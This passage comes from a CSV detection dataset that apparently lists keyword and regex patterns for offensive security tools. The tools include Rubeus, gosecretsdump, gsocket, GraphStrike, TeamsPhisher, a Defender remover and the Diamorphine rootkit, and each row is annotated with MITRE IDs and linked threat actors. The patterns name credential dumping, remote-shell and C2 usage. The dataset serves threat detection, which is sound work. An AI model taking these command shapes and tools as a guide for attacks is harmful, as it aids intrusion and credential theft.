Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1352" "* golden * /user:*",".{0,1000}\sgolden\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1353" "* goldenPac.py *",".{0,1000}\sgoldenPac\.py\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","1354" "* goldenPac.py -c *.exe*",".{0,1000}\sgoldenPac\.py\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","1355" "* goldenPac.py*",".{0,1000}\sgoldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1356" "* google_drive_doubledrive.py*",".{0,1000}\sgoogle_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1357" "* gopher-ls.nse*",".{0,1000}\sgopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1358" "* gophish-*.zip*",".{0,1000}\sgophish\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","1359" "* gosecretsdump_linux*",".{0,1000}\sgosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#linux","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1360" "* gosecretsdump_mac*",".{0,1000}\sgosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1361" "* gosecretsdump_win*",".{0,1000}\sgosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1362" "* GOTO :removeantivirus*",".{0,1000}\sGOTO\s\:removeantivirus.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","1365" "* goWMIExec_linux_*",".{0,1000}\sgoWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#linux","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1367" "* 
goWMIExec_mac_*",".{0,1000}\sgoWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1368" "* goWMIExec_win_*",".{0,1000}\sgoWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1369" "* GPOBrowser.py*",".{0,1000}\sGPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","1370" "* 'GPODDITY$' *",".{0,1000}\s\'GPODDITY\$\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1371" "* --gpo-id * --domain * --command *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1372" "* --gpo-id * --gpo-type * --no-smb-server *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-gpo\-type\s.{0,1000}\s\-\-no\-smb\-server\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1373" "* --GPOName * --FilterEnabled --TargetDnsName *",".{0,1000}\s\-\-GPOName\s.{0,1000}\s\-\-FilterEnabled\s\-\-TargetDnsName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","1374" "* gpp_autologin*",".{0,1000}\sgpp_autologin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1375" "* gpp_password*",".{0,1000}\sgpp_password.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1376" "* gpsd-info.nse*",".{0,1000}\sgpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1377" "* Graphpython.py*",".{0,1000}\sGraphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","1378" "*--------------------- GraphRunner Module ----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGraphRunner\sModule\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1379" "* GraphRunner.ps1*",".{0,1000}\sGraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1380" "* GraphSpy.py*",".{0,1000}\sGraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial 
Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","1381" "* GraphStrike.py*",".{0,1000}\sGraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","1382" "* GreatSCT/*",".{0,1000}\sGreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","1383" "* --greeting * --personalize *--securelink*",".{0,1000}\s\-\-greeting\s.{0,1000}\s\-\-personalize\s.{0,1000}\-\-securelink.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","1384" "* -grouper2 -Command *",".{0,1000}\s\-grouper2\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","1385" "* GS_STTY_INIT_HACK*",".{0,1000}\sGS_STTY_INIT_HACK.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1386" "* gserver/Dockerfile *",".{0,1000}\sgserver\/Dockerfile\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1387" "* gs-netcat *",".{0,1000}\sgs\-netcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1388" "* gsocket-*.tar.gz*",".{0,1000}\sgsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1389" "* gsocket.io/x*",".{0,1000}\sgsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1390" "* gsocket_*_all.deb*",".{0,1000}\sgsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1391" "* GSOCKET_SOCKS_IP*",".{0,1000}\sGSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1392" "* gtfobin_update.py*",".{0,1000}\sgtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1393" "* gtfonow.py*",".{0,1000}\sgtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1394" "* 
gtunnel-server-debug*",".{0,1000}\sgtunnel\-server\-debug.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1395" "* -H * -u * -p * -r *C$/Users*",".{0,1000}\s\-H\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-r\s.{0,1000}C\$\/Users.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","1397" "* -h *-p * -c cypher.bin -k key.bin*",".{0,1000}\s\-h\s.{0,1000}\-p\s.{0,1000}\s\-c\scypher\.bin\s\-k\skey\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","1398" "* hack.py*",".{0,1000}\shack\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1399" "* HackBrowserData*",".{0,1000}\sHackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","1400" "* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 
- T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","1401" "* hackergu *",".{0,1000}\shackergu\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1402" "* hackshell.sh*",".{0,1000}\shackshell\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","1403" "* hadoop-datanode-info.nse*",".{0,1000}\shadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1404" "* hadoop-jobtracker-info.nse*",".{0,1000}\shadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1405" "* hadoop-namenode-info.nse*",".{0,1000}\shadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1406" "* hadoop-secondary-namenode-info.nse*",".{0,1000}\shadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1407" "* hadoop-tasktracker-info.nse*",".{0,1000}\shadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1408" "* 